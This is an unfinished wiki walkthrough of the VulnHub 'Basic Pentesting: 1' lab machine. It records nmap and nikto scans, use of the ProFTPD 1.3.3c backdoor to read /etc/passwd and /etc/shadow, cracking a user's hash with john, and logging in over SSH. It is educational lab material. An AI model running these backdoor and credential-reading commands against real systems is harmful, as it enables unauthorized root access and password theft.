Basic Pentesting: 1 - Boot-to-Root Walkthrough

Revision as of 13:32, 2 May 2018 by Dmina (talk | contribs)

Objective

Explore multiple remote vulnerabilities and multiple privilege escalation vectors to gain access to and gain root privileges on the target host.

Source: [VulnHub.com]

Methodology

Discovery

# Nmap 7.60 scan initiated Tue Apr  3 07:31:41 2018 as: nmap -O -sT -sV -p- -T5 -oN nmap.txt 192.168.56.102
Nmap scan report for 192.168.56.102
Host is up (0.00088s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr  3 07:32:08 2018 -- 1 IP address (1 host up) scanned in 26.77 seconds

Port 21 / ProFTPD 1.3.3c looks interesting - ProFTPd1.3 is known to be prone to RCE so let's go for the low hanging fruit first

Entry Point #1 - Port 21 (FTP)

Tools: nmap

# Nmap 7.60 scan initiated Tue Apr  3 07:33:26 2018 as: nmap -p 21 --script ftp* -oN nmap_ftp.txt 192.168.56.102
Nmap scan report for 192.168.56.102
Host is up (0.00033s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-brute: 
|   Accounts: No valid accounts found
|_  Statistics: Performed 8420 guesses in 608 seconds, average tps: 13.5
| ftp-proftpd-backdoor: 
|   This installation has been backdoored.
|   Command: id
|_  Results: uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)

# Nmap done at Tue Apr  3 07:43:48 2018 -- 1 IP address (1 host up) scanned in 621.71 seconds

Voila! We can haz root! Let's try the exploit

root@kali:~/Desktop/Basic_Pentesting_1# nmap --script ftp-proftpd-backdoor --script-args 'cmd=cat /etc/passwd' -p 21 192.168.56.102 |grep "/bin/bash"
|   Results: root:x:0:0:root:/root:/bin/bash
|   marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash
root@kali:~/Desktop/Basic_Pentesting_1# nmap --script ftp-proftpd-backdoor --script-args 'cmd=cat /etc/shadow' -p 21 192.168.56.102 |grep -E "(root|marlinspike)"
|   Results: root:!:17484:0:99999:7:::
|   marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::
root@kali:~/Desktop/Basic_Pentesting_1# echo "marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/" > john.txt
root@kali:~/Desktop/Basic_Pentesting_1# john john.txt 
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
marlinspike      (marlinspike)
1g 0:00:00:00 DONE 1/3 (2018-04-03 08:08) 7.142g/s 57.14p/s 57.14c/s 57.14C/s marlinspike..marlinspikes
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/Desktop/Basic_Pentesting_1# ssh marlinspike@vtcsec
The authenticity of host 'vtcsec (192.168.56.102)' can't be established.
ECDSA key fingerprint is SHA256:VpmqtJLBtzleV/ibg84tX0hax9+PC3nojkEOPOVhdJU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'vtcsec,192.168.56.102' (ECDSA) to the list of known hosts.
marlinspike@vtcsec's password: 
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)
......
marlinspike@vtcsec:~$

Entry Point #2 - Port 80 (HTTP)

Tools: nmap, nc

- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.56.103
+ Target Port: 80
+ GET Server leaks inodes via ETags, header found with file /, fields: 0xb1 0x55e1c7758dcdb 
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. 
+ OPTIONS Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ GET Uncommon header 'link' found, with contents: <http://vtcsec/secret/index.php/wp-json/>; rel="https://api.w.org/"
+ OSVDB-3092: GET /secret/: This might be interesting...
+ OSVDB-3233: GET /icons/README: Apache default file found.


Two things pop right away:

  • Possible Wordpress installation
  • 'vtcsec' hostname

<< to be continued >>

Recommendations

Appendix A: Vulnerability Detail and Mitigation

Unpatched Software Components
Rating High
Description xxxxxx
Impact xxxxx
Remidiation xxxxx